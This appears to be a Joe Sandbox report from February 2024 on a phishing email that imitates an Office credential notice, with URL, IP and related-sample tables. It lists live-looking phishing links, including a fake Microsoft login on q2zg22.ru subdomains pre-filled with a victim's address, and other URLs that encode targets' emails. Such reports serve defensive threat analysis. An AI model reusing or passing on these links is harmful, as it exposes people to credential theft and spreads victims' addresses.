                                                                            https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comfalse
                                                                              unknown
                                                                              https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.giffalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://office.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                                                                                high
                                                                                https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_7582d7648944aa49d261.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comfalse
                                                                                  unknown
                                                                                  https://office.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://sushishop.commande?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://sushishop.commander1.com/c3=3Ffirsttime?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                    high
                                                                                    https://sushishop.commander1.com/c3=3Ffirstti?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                      high
                                                                                      https://sushishop.commander1.com/c3?firsttime=3D1&tcs=3D2478&=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                        high
                                                                                        http://augloop.office.com/settings.jsonprep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drfalse
                                                                                          high
                                                                                          http://thumbnail=5Fdocusign.png/dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          low
                                                                                          https://nam-sonar.atp.protection.outlook.com/sonarapi=3Fcon?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                            high
                                                                                            https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#chromecache_105.6.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://json-schema.org/draft-07/schema#prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drfalse
                                                                                              high
                                                                                              https://augloop.office.comApp1706901443419558900_339ECE70-F791-4C73-BA10-ACB54261FBCD.log.0.drfalse
                                                                                                high
                                                                                                http://knockoutjs.com/chromecache_125.6.dr, chromecache_108.6.drfalse
                                                                                                  high
                                                                                                  https://github.com/douglascrockford/JSON-jschromecache_125.6.dr, chromecache_108.6.dr, chromecache_126.6.dr, chromecache_132.6.dr, chromecache_110.6.drfalse
                                                                                                    high
                                                                                                    https://sushishop.?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.opensource.org/licenses/mit-license.php)chromecache_125.6.dr, chromecache_108.6.drfalse
                                                                                                      high
                                                                                                      https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email~WRS{51F6B9FC-CB2E-4D7B-B14D-FEA48266E42B}.tmp.0.drfalse
                                                                                                        high
                                                                                                        https://sushishop.commander1.com/c?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                                          high
                                                                                                          https://sushishop.commander1.com/c3?=dudick SystemDesk Important Crediential Notification 1.emlfalse
                                                                                                            high
                                                                                                            http://feross.orgchromecache_126.6.drfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              13.107.246.41
                                                                                                              unknownUnited States
                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                              172.67.209.71
                                                                                                              office.q2zg22.ruUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              162.241.124.47
                                                                                                              galeonconstruction.comUnited States
                                                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                                                              13.107.213.41
                                                                                                              part-0013.t-0009.t-msedge.netUnited States
                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                              13.107.213.40
                                                                                                              part-0012.t-0009.t-msedge.netUnited States
                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                              64.233.185.84
                                                                                                              accounts.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              142.250.105.99
                                                                                                              www.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              152.199.4.44
                                                                                                              cs1100.wpc.omegacdn.netUnited States
                                                                                                              15133EDGECASTUSfalse
                                                                                                              142.250.105.100
                                                                                                              unknownUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              239.255.255.250
                                                                                                              unknownReserved
                                                                                                              unknownunknownfalse
                                                                                                              35.181.229.138
                                                                                                              mix-collect-it-prod-481773621.eu-west-3.elb.amazonaws.comUnited States
                                                                                                              16509AMAZON-02USfalse
                                                                                                              13.107.213.51
                                                                                                              part-0023.t-0009.t-msedge.netUnited States
                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                              104.21.85.189
                                                                                                              react.q2zg22.ruUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              142.251.15.113
                                                                                                              clients.l.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              IP
                                                                                                              192.168.2.16
                                                                                                              Joe Sandbox version:39.0.0 Ruby
                                                                                                              Analysis ID:1385782
                                                                                                              Start date and time:2024-02-02 20:16:56 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 5m 21s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:15
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:dudick SystemDesk Important Crediential Notification 1.eml
                                                                                                              Detection:MAL
                                                                                                              Classification:mal80.phis.winEML@37/89@38/15
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .eml
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 52.113.194.132, 23.209.188.146, 23.209.188.145, 13.89.178.27, 192.229.211.108, 64.233.177.94, 34.104.35.123, 96.7.225.26, 96.7.225.35, 172.217.215.95, 142.250.105.95, 108.177.122.95, 64.233.177.95, 74.125.138.95, 142.250.9.95, 64.233.185.95, 173.194.219.95, 64.233.176.95, 172.253.124.95, 74.125.136.95, 142.251.15.95, 20.189.173.10, 23.40.205.59, 23.40.205.43, 74.125.138.94, 23.59.235.213, 23.59.235.214, 20.189.173.4, 20.189.173.16
                                                                                                              • Excluded domains from analysis (whitelisted): logincdn.msauth.net, omex.cdn.office.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, a1894.dscb.akamai.net, acctcdn.msauth.net, acctcdn.trafficmanager.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdwus03.westus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, update.googleapis.com, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, a1864.dscd.akamai.net, ecs.office.com, acctcdnmsftuswe2.azureedge.net, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, onedscolprdcus03.centralus.cloudapp.azure.com, acctcdnmsftuswe2.afd.azureedge.net, lgincdnvzeuno.ec.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, s-0005-office.config.skype.com, onedscolprdwus17.westus.cloudapp.azure.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, lgincdnvzeuno.azureedge.net, browser.events.data.microsof
                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • VT rate limit hit for: dudick SystemDesk Important Crediential Notification 1.eml
                                                                                                              No simulations
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              162.241.124.47http://erichwcreative.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • erichwcreative.com/
                                                                                                              https://gem.godaddy.com/signups/activate/MS0talpBQ0Zwb2kvQXFpdVpicjVwbEl6RTBJZmljTzVGSzZuVmlxTXRuckNKdTdiRXdZdkJWVXFqclREUkk4UmxzNy9XMXJSN0pwYlo0SnQrQUJNZjVUaVhvV2ovNDctLUR4SWQvakRySUF0YnRMUmMtLWVUQzlRd0d4WlAvVUxCWmovM0lRbFE9PQ==?signup=9180039Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • doubleclosearizona.com/brddsa/rghhfd/
                                                                                                              https://bclientes.cwpanama.com/customers/module.php/core/loginuserpass.php?AuthState=_f6522b387362565de2fd6c90c667dff1393e050975%3Ahttp://wintrustmortgage.jowersleach.com/wintrustmortgage#261626972636868696c6c4077696e74727573746d6f7274676167652e636f6dGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • wintrustmortgage.jowersleach.com/wintrustmortgage
                                                                                                              https://email-track.shoplazza.com/?email_id=20230720100050.f77f9280aed76e07&order_ids=844112-00000483&redirect_url=http%3A%2F%2Fkcexoticconstructioninc.com%2Foki%2Fseaboardmarine%2FbGFzaGF3bi5lZHdhcmRzQHNlYWJvYXJkbWFyaW5lLmNvbQ==%3Femail_id%3D20230720100050.f77f9280aed76e07%26ut_campaign%3Dshoplazza_checkout_reminder%26ut_medium%3Demail%26ut_source%3Dshoplazza_checkout%26utm_medium%3Demail&store_id=844112Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • kcexoticconstructioninc.com/favicon.ico
                                                                                                              https://www.horsesmouth.com/LinkTrack.aspx?u=http://aresmgmt.travelvot.com/aresmgmt#764736869656c647340617265736d676d742e636f6dGet hashmaliciousUnknownBrowse
                                                                                                              • aresmgmt.travelvot.com/red.php?e=764736869656c647340617265736d676d742e636f6d
                                                                                                              https://www.bing.com/ck/a?!&&p=df77fb8d7d4963b8JmltdHM9MTY4Njg3MzYwMCZpZ3VpZD0xYmU3YmIyOS0xMDJlLTZkNmItMzUzNy1hOWUyMTFhYTZjMzYmaW5zaWQ9NTEzNw&ptn=3&hsh=3&fclid=1be7bb29-102e-6d6b-3537-a9e211aa6c36&u=a1aHR0cDovL2dydmFjYXRpb25ob21lcy5jb20v#Z3JhbnQuaGVuZGVyc29uQGhpbGNvcnAuY29tGet hashmaliciousPhisherBrowse
                                                                                                              • grvacationhomes.com/
                                                                                                              https://fvkscllq.r.sa-east-1.awstrack.me/L0/https:%2F%2Faccess.yonsei.ac.kr%2Flink.n2s%3Furl=%2F%2Ftinyurl%252ecom%2F3fvrm9bn%3Fn7cds=anVsaWFuLnZhbHZlcmRlQGRhcmdyb3VwLmNvbQ==/1/010301884a076fc3-811ffb2c-ade6-4d62-afdf-5f75c5d48ceb-000000/xYVZbY8wl4e6ggCn7L6JsNY8oo4=108Get hashmaliciousUnknownBrowse
                                                                                                              • fnorth.londonskaja.com/favicon.ico
                                                                                                              https://access.yonsei.ac.kr/link.n2s?url=//tinyurl%2ecom/2m2hxkm8?pomo12=bmJhY2NhbGFAdGJjLnVz&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • south.stiltsbrewing.com/favicon.ico
                                                                                                              http://i4tuaoy0smqlfsir.jared.simmons.visitgreersferry.com/office/index.php/?e=amFyZWQuc2ltbW9uc0B0b3lvdGEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • i4tuaoy0smqlfsir.jared.simmons.visitgreersferry.com/office/index.php/?e=amFyZWQuc2ltbW9uc0B0b3lvdGEuY29t
                                                                                                              http://aag2p37lF4KTOHED.michele.lantz.visitgreersferry.com/office/index.php/?e=bWljaGVsZS5sYW50ekBpaS12aS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • aag2p37lf4ktohed.michele.lantz.visitgreersferry.com/office/index.php/?e=bWljaGVsZS5sYW50ekBpaS12aS5jb20=
                                                                                                              13.107.246.41http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQGet hashmaliciousUnknownBrowse
                                                                                                              • appcenter.ms/
                                                                                                              http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3DGet hashmaliciousUnknownBrowse
                                                                                                              • twiliosolutions.azurefd.net/
                                                                                                              172.67.209.71123.scr.exeGet hashmaliciousRags StealerBrowse
                                                                                                                123.scr.exeGet hashmaliciousRags StealerBrowse
                                                                                                                  SecuriteInfo.com.FileRepMalware.dllGet hashmaliciousUnknownBrowse
                                                                                                                    case (426).xlsGet hashmaliciousUnknownBrowse
                                                                                                                      case (61).xlsGet hashmaliciousUnknownBrowse
                                                                                                                        13.107.213.41http://www.serviceadg.comGet hashmaliciousUnknownBrowse
                                                                                                                        • fr.linkedin.com/company/service-adg
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        part-0013.t-0009.t-msedge.nethttps://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//eternalwife.com/marble/lvd3yho7bzaowkolaszc7oa57lqo88mm7qdthokec3yieinbv80tnolwce5rzj18pab5dvmd41knkzjfyzbsjrabdo1gyzdf1lrtbx7elhr0zwzopkc0ag48mmm8rhqwhyfrowmnjkmfoyszorer5icg5s5ificuvikfeukpwbxerywnoacodepcwhxhzt2j03bldcv2/dGVyZXNhbGVldGhAZGVsdGVrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        https://ntnusa0-my.sharepoint.com/:f:/g/personal/ajaronik_ntnusa_com/EjzRads0Sf5Ivon47-zBKVABS1TZOI64W6Uv34YFqNQjmQ?e=NuZrjrGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        SecuriteInfo.com.Win32.TrojanX-gen.30698.14058.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                        • 13.107.213.41
                                                                                                                        https://upvir.al/155175/lp155175Get hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.213.41
                                                                                                                        https://indd.adobe.com/view/94cb7fb1-f867-41c8-827f-b64ddcc18c41Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        SecuriteInfo.com.Win32.CoinminerX-gen.29269.21386.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        https://ex.securemail.intermedia.net/login.html?msgUserId=5d25d00a2b10f341&enterprise=o365emg_pricemdsinc_1745490&rrRegcode=69xzZWrn&locale=en_USGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        PDFSuperHero.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        SecuriteInfo.com.Win32.TrojanX-gen.16213.27246.exeGet hashmaliciousAmadey, RedLine, RisePro Stealer, Stealc, XmrigBrowse
                                                                                                                        • 13.107.246.41
                                                                                                                        https://www.joesandbox.com/login&c=E,1,3sdrHGA3So5qfROqsp7g0scjBfmFFex1Wo5EThPQVwleKlocgzccwXOVLCQ6EaAxQlwPgdPnkNIRDPH8qFB4qmUXhHI28ukpC0iPU7B3qR63KsrXXjlBcvtw&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.213.41
                                                                                                                        cs1100.wpc.omegacdn.nethttps://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//eternalwife.com/marble/lvd3yho7bzaowkolaszc7oa57lqo88mm7qdthokec3yieinbv80tnolwce5rzj18pab5dvmd41knkzjfyzbsjrabdo1gyzdf1lrtbx7elhr0zwzopkc0ag48mmm8rhqwhyfrowmnjkmfoyszorer5icg5s5ificuvikfeukpwbxerywnoacodepcwhxhzt2j03bldcv2/dGVyZXNhbGVldGhAZGVsdGVrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://ntnusa0-my.sharepoint.com/:f:/g/personal/ajaronik_ntnusa_com/EjzRads0Sf5Ivon47-zBKVABS1TZOI64W6Uv34YFqNQjmQ?e=NuZrjrGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://ex.securemail.intermedia.net/login.html?msgUserId=5d25d00a2b10f341&enterprise=o365emg_pricemdsinc_1745490&rrRegcode=69xzZWrn&locale=en_USGet hashmaliciousUnknownBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://url-shield.securence.com/?p=1.0&r=scotty@wbdlawfirm.com&sid=1682685628599-081-00068778&s=svuwf4lb&n=bq7d6cgui&ms=0.2,0.2,0.0,0.0&u=http://gklaw.pgasso.org/gklaw#16a62696c6c696e677340676b6c61772e636f6dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//shakesbeer.tv/xxxl/depressed/qougyzxsu4ecz8gauxsmqimobscltse8xsypgrrjwkxred2ivx8emeaynrqzuchh7ll6rmignqi4rzge3rpvxi81net0quuzcn16oobrjyburbadgf1darviefqp2er3mhceft1o6ae6hmvkrghibthhmvjnfui8hmcvgl2t3knoykruimj80h42rl0xpobiblo6zxt5/ZXRob21hc0BkZndqb2JzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://alsic0-my.sharepoint.com/:f:/g/personal/jsilvia_cpstechnologysolutions_com/En-Hgk0yL4VImyHuKwgnw80BmpoigC0QGozVagwfZqj0Aw?e=0RSNMeGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://u5115803.ct.sendgrid.net/ls/click?upn=R6Tw4sdswMk-2FmWQ7vsvlzxfGO813C0REqRD3yzdGwcuoBRd8Zzbo65Cyi2g8DWJkXBdA33aa-2B9BLHkNIFSrLBtIhzdS5olhQMy0yOJ4i-2BA9o5xwQ0i78nMc4C1xokcsczQBNwKM2oRzTImJAHQKAIg-3D-3D9tZH_7-2BzvUTEDUu8MndgRqlGqZpZJHh3Ct6HznYAeeXCPEqgJbHlRiWeHz99ywftn-2FNOqCuTY2sKf7h5ljIuDE4zzIU71dVYQOJQE-2Bg2RJuhCxaHKDXsQNW-2FDrvmfkXyUuT-2FKpC3URsxfXtkWMf3m0n2vtK8cLcPUwZvLyr1Dhv-2FjZixAlj0IxDq-2BsAHsvNfw1VrXd-2BQclqjyiKaOetbKiKdrqQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        e-billdue.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://ecv.microsoft.com/Uy4YqXx0b4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        https://www.my-link.com.au/mtcgi/tracklink3.php?x=D0304A3F.05AAE513&href=//crispeebites.com/my/cv/Cdigroup/bWF0dGhld21AY2RpZ3JvdXAuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.199.4.44
                                                                                                                        sni1gl.wpc.alphacdn.nethttps://ex.securemail.intermedia.net/login.html?msgUserId=5d25d00a2b10f341&enterprise=o365emg_pricemdsinc_1745490&rrRegcode=69xzZWrn&locale=en_USGet hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://ecv.microsoft.com/Uy4YqXx0b4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://nam.safelink.emails.azure.net/redirect/?destination=https%3A%2F%2Fwww.microsoft.com%2Fworkplace-discount-program%3Ftoken%3D19c888ec-6402-49e1-a9ae-e189ed3e4cb9%26ocid%3Deml_OrganicEligibility_cons_officehup_acq_hup_poceligibility&p=bT1mNjU4NjMyYy0xNjE2LTRmNmMtODUyMy00NDI2YTllMzZiZjAmcz0wMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDAmdT1hZW8mbD13b3JrcGxhY2UtZGlzY291bnQtcHJvZ3JhbQ%3D%3DGet hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://www.officentry.com/eur/a1109567-0815-4e1f-88af-e23555482aaa/b2233923-7dc6-40e7-b797-605943979999/067baec5-2b3e-4eaa-8df4-762837407c44/attachment?id=UHdOLy9Va05SRnVlT3R5Y0hZRWNTaEdvVGtMQnZWdEdobmt3UkF3Y1owTkVYc3BJUXozTEFNVGE0S01YTkJkR3pMaFBIZVRtT3E3U0VwNVpnUmk1M1hMbE92NzlHNTR5L1lxcHY1aENpRDZtQ1FBaXlOaTMvaTVQL3d3MVNXMUZmalkzUDF6Y0tOVlp2TE5XSHc2NkJDb0hSOHp2cFEzUk1qcDNkTDY2ZDR5eFlIcUlONjVXeGNteGxlQkM3MEFFUWVudkhuc0pXTVBGNVloMXQwa1l2QVMzSW5GdjJlQ1E0bGxhZXlCMjRyR1Q4dWdrOXpjbWd3UUV0R1R5ZXFXa2NRQmltMTl1NmN0SDhVcGlvTkVrWDR5VUN4bHFpNWZZOGlPRElIOFlwTzNXMUozSW5MazB6bmlGTjlIeU9wYkZWZ1k1SSt4KzdRd2dSNktQOHhzbjhiS0Z3NkhobVNLNXlWZ1NOL25MK0F4R0pCcGROenE2bEx4R2YrYzc4RU8zZjdjYncxZ09jMUt6cytrY2pzdzVkQT09Get hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://pub-0dfe6b33707f44f5894443b1c563917d.r2.dev/keep/7h2d9.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://hawaiiu.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://1drv.ms/b/s!AisItIFTqa7WxVoBq8jnSh6FMqc_?e=bIfn69&d=DwMGaQGet hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        Palworld.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        http:///lerimef473cubenecom.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        https://outlook.cyberlab-x.com/mailGet hashmaliciousUnknownBrowse
                                                                                                                        • 152.195.19.97
                                                                                                                        part-0023.t-0009.t-msedge.nethttps://hawaiiu.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.213.51
                                                                                                                        https://www.canva.com/design/DAF7Xnc70eQ/4cd5cG-luYIDmUkN4IEphg/view?utm_content=DAF7Xnc70eQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.51
                                                                                                                        Garfieldpolice_Receipt_823481010238.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.51
                                                                                                                        ACH_Paid.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.51
                                                                                                                        https://outlook.cyberlab-x.com/mailGet hashmaliciousUnknownBrowse
